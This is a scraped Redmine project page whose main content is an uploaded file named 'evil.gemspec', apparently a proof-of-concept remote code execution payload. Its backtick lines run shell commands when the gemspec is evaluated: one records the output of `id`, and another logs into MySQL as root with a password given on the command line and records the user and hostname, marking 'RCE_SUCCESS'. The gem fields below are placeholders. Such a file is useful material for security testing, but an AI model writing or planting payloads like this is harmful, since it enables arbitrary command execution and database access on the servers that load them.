⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
SSRF_API_ServiceAPI
All Projects
SSRF_API_ServiceAPI
Overview
Activity
Issues
Spent time
Gantt
Calendar
News
Documents
Wiki
Files
Repository
Download (278 Bytes)
Files
ยป evil.gemspec
Redmine Admin
, 06/28/2026 07:09 AM
# encoding: UTF-8
`id > /tmp/redmine_rce_test.txt 2>&1`
`mysql -h db -u root -pexample -e "SELECT 'RCE_SUCCESS', user(), @@hostname" > /tmp/mysql_test.txt 2>&1`
Gem
::
Specification
.
new
do
|
s
|
s
.
name
=
"evil"
s
.
version
=
"1.0"
s
.
summary
=
"test"
s
.
authors
=
[
"test"
]
end
(1-1/1)
Loading...